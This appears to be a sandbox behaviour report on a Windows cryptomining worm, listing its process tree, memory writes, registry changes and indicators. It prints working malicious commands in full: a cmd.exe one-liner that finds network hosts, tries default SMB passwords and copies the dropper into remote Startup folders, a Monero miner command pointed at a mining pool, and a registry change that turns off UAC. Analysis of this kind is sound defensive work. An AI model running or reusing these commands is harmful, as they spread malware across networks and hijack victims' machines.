Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.execmd.execmd.exe

description	pid	process	target process
PID 1804 wrote to memory of 1116	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	taskhost.exe
PID 1804 wrote to memory of 1172	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	Dwm.exe
PID 1804 wrote to memory of 1256	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	Explorer.EXE
PID 1804 wrote to memory of 1596	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	VID001.exe
PID 1804 wrote to memory of 1596	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	VID001.exe
PID 1804 wrote to memory of 1596	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	VID001.exe
PID 1804 wrote to memory of 1596	1804	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	VID001.exe
PID 1596 wrote to memory of 1116	1596	VID001.exe	taskhost.exe
PID 1596 wrote to memory of 1172	1596	VID001.exe	Dwm.exe
PID 1596 wrote to memory of 1256	1596	VID001.exe	Explorer.EXE
PID 1596 wrote to memory of 1116	1596	VID001.exe	taskhost.exe
PID 1596 wrote to memory of 1172	1596	VID001.exe	Dwm.exe
PID 1596 wrote to memory of 1256	1596	VID001.exe	Explorer.EXE
PID 1596 wrote to memory of 640	1596	VID001.exe	DllHost.exe
PID 1596 wrote to memory of 552	1596	VID001.exe	DllHost.exe
PID 1596 wrote to memory of 1116	1596	VID001.exe	taskhost.exe
PID 1596 wrote to memory of 1172	1596	VID001.exe	Dwm.exe
PID 1596 wrote to memory of 1256	1596	VID001.exe	Explorer.EXE
PID 1596 wrote to memory of 552	1596	VID001.exe	DllHost.exe
PID 1596 wrote to memory of 1116	1596	VID001.exe	taskhost.exe
PID 1596 wrote to memory of 1172	1596	VID001.exe	Dwm.exe
PID 1596 wrote to memory of 1256	1596	VID001.exe	Explorer.EXE
PID 1596 wrote to memory of 552	1596	VID001.exe	DllHost.exe
PID 1596 wrote to memory of 1116	1596	VID001.exe	taskhost.exe
PID 1596 wrote to memory of 1172	1596	VID001.exe	Dwm.exe
PID 1596 wrote to memory of 1256	1596	VID001.exe	Explorer.EXE
PID 1596 wrote to memory of 552	1596	VID001.exe	DllHost.exe
PID 1596 wrote to memory of 1116	1596	VID001.exe	taskhost.exe
PID 1596 wrote to memory of 1172	1596	VID001.exe	Dwm.exe
PID 1596 wrote to memory of 1256	1596	VID001.exe	Explorer.EXE
PID 1596 wrote to memory of 552	1596	VID001.exe	DllHost.exe
PID 1596 wrote to memory of 1116	1596	VID001.exe	taskhost.exe
PID 1596 wrote to memory of 1172	1596	VID001.exe	Dwm.exe
PID 1596 wrote to memory of 1256	1596	VID001.exe	Explorer.EXE
PID 1596 wrote to memory of 552	1596	VID001.exe	DllHost.exe
PID 1596 wrote to memory of 1116	1596	VID001.exe	taskhost.exe
PID 1596 wrote to memory of 1172	1596	VID001.exe	Dwm.exe
PID 1596 wrote to memory of 1256	1596	VID001.exe	Explorer.EXE
PID 1596 wrote to memory of 552	1596	VID001.exe	DllHost.exe
PID 1596 wrote to memory of 1300	1596	VID001.exe	cmd.exe
PID 1596 wrote to memory of 1300	1596	VID001.exe	cmd.exe
PID 1596 wrote to memory of 1300	1596	VID001.exe	cmd.exe
PID 1596 wrote to memory of 1300	1596	VID001.exe	cmd.exe
PID 1596 wrote to memory of 1588	1596	VID001.exe	cmd.exe
PID 1596 wrote to memory of 1588	1596	VID001.exe	cmd.exe
PID 1596 wrote to memory of 1588	1596	VID001.exe	cmd.exe
PID 1596 wrote to memory of 1588	1596	VID001.exe	cmd.exe
PID 1300 wrote to memory of 956	1300	cmd.exe	taskkill.exe
PID 1300 wrote to memory of 956	1300	cmd.exe	taskkill.exe
PID 1300 wrote to memory of 956	1300	cmd.exe	taskkill.exe
PID 1300 wrote to memory of 956	1300	cmd.exe	taskkill.exe
PID 1588 wrote to memory of 1092	1588	cmd.exe	PING.EXE
PID 1588 wrote to memory of 1092	1588	cmd.exe	PING.EXE
PID 1588 wrote to memory of 1092	1588	cmd.exe	PING.EXE
PID 1588 wrote to memory of 1092	1588	cmd.exe	PING.EXE
PID 1588 wrote to memory of 1020	1588	cmd.exe	taskkill.exe
PID 1588 wrote to memory of 1020	1588	cmd.exe	taskkill.exe
PID 1588 wrote to memory of 1020	1588	cmd.exe	taskkill.exe
PID 1588 wrote to memory of 1020	1588	cmd.exe	taskkill.exe
PID 1300 wrote to memory of 1140	1300	cmd.exe	taskkill.exe
PID 1300 wrote to memory of 1140	1300	cmd.exe	taskkill.exe
PID 1300 wrote to memory of 1140	1300	cmd.exe	taskkill.exe
PID 1300 wrote to memory of 1140	1300	cmd.exe	taskkill.exe
PID 1596 wrote to memory of 1372	1596	VID001.exe	uihost64.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exe50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	VID001.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1256

C:\Users\Admin\AppData\Local\Temp\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
"C:\Users\Admin\AppData\Local\Temp\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe"
2⤵
- Modifies firewall policy service
- Loads dropped DLL
- Windows security modification
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1804

C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe
"C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe"
3⤵
- Modifies firewall policy service
- Executes dropped EXE
- Deletes itself
- Drops startup file
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1596

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /f /im NsCpuCNMiner* & taskkill /f /im IMG0*
4⤵
- Suspicious use of WriteProcessMemory
PID:1300

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im NsCpuCNMiner*
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:956

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im IMG0*
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1140

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /f /im uihost* & taskkill /f /im DOC0*
4⤵
- Suspicious use of WriteProcessMemory
PID:1588

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im uihost*
5⤵
- Kills process with taskkill
PID:1092

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im DOC0*
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1020

C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe
"C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe" -o stratum+tcp://xmr-eu1.nanopool.org:14444 -t 1 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka.V --donate-level=1 --coin monero -p x
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=VID001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\!s!\%j\VID001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" %d) & net use %c /delete /y & ping -n 20 localhost)))
4⤵
PID:828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net view|find /i "\\" || arp -a|find /i " 1"
5⤵
PID:1600

C:\Windows\SysWOW64\find.exe
find /i "\\"
6⤵
PID:848

C:\Windows\SysWOW64\net.exe
net view
6⤵
- Discovers systems in the same network
PID:1620

C:\Windows\SysWOW64\ARP.EXE
arp -a
6⤵
PID:1048

C:\Windows\SysWOW64\find.exe
find /i " 1"
6⤵
PID:1544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net view \\10.7.0.13|find /i " "
5⤵
PID:1740

C:\Windows\SysWOW64\find.exe
find /i " "
6⤵
PID:1496

C:\Windows\SysWOW64\net.exe
net view \\10.7.0.13
6⤵
- Discovers systems in the same network
PID:1752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c set str_
5⤵
PID:1356

C:\Windows\SysWOW64\net.exe
net use * /delete /y
5⤵
PID:740

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
- Runs ping.exe
- Suspicious use of AdjustPrivilegeToken
PID:1092

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.13\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:1828

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.13\C$\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:1080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:1312

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.13\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:1752

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ /delete /y
5⤵
PID:1740

C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
5⤵
PID:1600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:1436

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.13\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:1536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:1952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:1620

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.13\Users\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"
5⤵
- Enumerates system info in registry
PID:912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
- Enumerates system info in registry
PID:1080

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.13\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:1492

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users /delete /y
5⤵
PID:1740

C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
5⤵
- Runs ping.exe
PID:1896

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:328

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ """" /user:"1"
5⤵
PID:1444

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users """" /user:"1"
5⤵
PID:2012

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:1156

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
6⤵
PID:1256

C:\Users\Admin\AppData\Local\Temp\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
"C:\Users\Admin\AppData\Local\Temp\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe"
7⤵
- Modifies firewall policy service
- Loads dropped DLL
- Windows security modification
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:1804

C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe
"C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe"
8⤵
- Modifies firewall policy service
- Executes dropped EXE
- Deletes itself
- Drops startup file
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- System policy modification
PID:1596

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /f /im NsCpuCNMiner* & taskkill /f /im IMG0*
9⤵
PID:1300

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im NsCpuCNMiner*
10⤵
- Kills process with taskkill
PID:956

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im IMG0*
10⤵
- Kills process with taskkill
PID:1140

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /f /im uihost* & taskkill /f /im DOC0*
9⤵
PID:1588

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im uihost*
10⤵
- Kills process with taskkill
PID:1092

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im DOC0*
10⤵
- Kills process with taskkill
PID:1020

C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe
"C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe" -o stratum+tcp://xmr-eu1.nanopool.org:14444 -t 1 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka.V --donate-level=1 --coin monero -p x
9⤵
- Executes dropped EXE
PID:1372

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=VID001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\!s!\%j\VID001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" %d) & net use %c /delete /y & ping -n 20 localhost)))
9⤵
PID:828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net view|find /i "\\" || arp -a|find /i " 1"
10⤵
PID:1600

C:\Windows\SysWOW64\find.exe
find /i "\\"
11⤵
PID:848

C:\Windows\SysWOW64\net.exe
net view
11⤵
- Discovers systems in the same network
PID:1620

C:\Windows\SysWOW64\ARP.EXE
arp -a
11⤵
PID:1048

C:\Windows\SysWOW64\find.exe
find /i " 1"
11⤵
PID:1544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net view \\10.7.0.13|find /i " "
10⤵
PID:1740

C:\Windows\SysWOW64\find.exe
find /i " "
11⤵
PID:1496

C:\Windows\SysWOW64\net.exe
net view \\10.7.0.13
11⤵
- Discovers systems in the same network
PID:1752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c set str_
10⤵
PID:1356

C:\Windows\SysWOW64\net.exe
net use * /delete /y
10⤵
PID:740

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:1092

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.13\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:1828

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.13\C$\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:1080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:1312

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.13\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:1752

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ /delete /y
10⤵
PID:1740

C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
10⤵
- Runs ping.exe
PID:1600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:1436

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.13\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:1536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:1952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
PID:1620

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.13\Users\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"
10⤵
- Enumerates system info in registry
PID:912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
10⤵
- Enumerates system info in registry
PID:1080

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.13\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
10⤵
PID:1492

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users /delete /y
10⤵
PID:1740

C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
10⤵
PID:1896

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:328

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ """" /user:"1"
10⤵
PID:1444

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users """" /user:"1"
10⤵
PID:2012

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:1156

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "1" /user:"1"
10⤵
PID:1648

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "1" /user:"1"
10⤵
PID:1632

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:1184

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "1" /user:"1"
10⤵
PID:1984

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "1" /user:"1"
10⤵
PID:1892

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:964

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "123" /user:"1"
10⤵
PID:748

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "123" /user:"1"
10⤵
PID:1632

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:1012

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "0" /user:"10.7.0.13"
10⤵
PID:1616

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "0" /user:"10.7.0.13"
10⤵
PID:992

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:1104

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ """" /user:"10.7.0.13"
10⤵
PID:2016

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users """" /user:"10.7.0.13"
10⤵
PID:952

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:1948

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "10.7.0.13" /user:"10.7.0.13"
10⤵
PID:1616

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "10.7.0.13" /user:"10.7.0.13"
10⤵
PID:2040

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2020

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "1" /user:"10.7.0.13"
10⤵
PID:292

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "1" /user:"10.7.0.13"
10⤵
PID:616

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:384

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "123" /user:"10.7.0.13"
10⤵
PID:1108

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "123" /user:"10.7.0.13"
10⤵
PID:1444

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2020

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "0" /user:"administrator"
10⤵
PID:1916

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "0" /user:"administrator"
10⤵
PID:1328

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2004

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ """" /user:"administrator"
10⤵
PID:1940

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users """" /user:"administrator"
10⤵
PID:1948

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:936

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "administrator" /user:"administrator"
10⤵
PID:952

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "administrator" /user:"administrator"
10⤵
PID:1104

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:1940

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "1" /user:"administrator"
10⤵
PID:1328

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "1" /user:"administrator"
10⤵
PID:2016

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:1608

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "123" /user:"administrator"
10⤵
PID:1184

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "123" /user:"administrator"
10⤵
PID:936

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2012

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "0" /user:"user"
10⤵
PID:1184

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "0" /user:"user"
10⤵
PID:936

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:1104

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ """" /user:"user"
10⤵
PID:640

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users """" /user:"user"
10⤵
PID:1956

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2012

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "user" /user:"user"
10⤵
PID:1384

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "user" /user:"user"
10⤵
PID:2028

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:1980

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "1" /user:"user"
10⤵
PID:1976

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "1" /user:"user"
10⤵
PID:1752

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:2016

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "123" /user:"user"
10⤵
PID:1916

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "123" /user:"user"
10⤵
PID:1356

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:1980

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "0" /user:"admin"
10⤵
PID:2028

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "0" /user:"admin"
10⤵
PID:1752

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2016

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ """" /user:"admin"
10⤵
PID:1916

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users """" /user:"admin"
10⤵
- Enumerates system info in registry
PID:1752

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:936

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "admin" /user:"admin"
10⤵
PID:2028

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "admin" /user:"admin"
10⤵
PID:1584

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
- Runs ping.exe
PID:2016

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "1" /user:"admin"
10⤵
PID:1988

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "1" /user:"admin"
10⤵
PID:1356

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:936

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\C$ "123" /user:"admin"
10⤵
PID:1184

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.13\Users "123" /user:"admin"
10⤵
PID:1584

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
10⤵
PID:1916

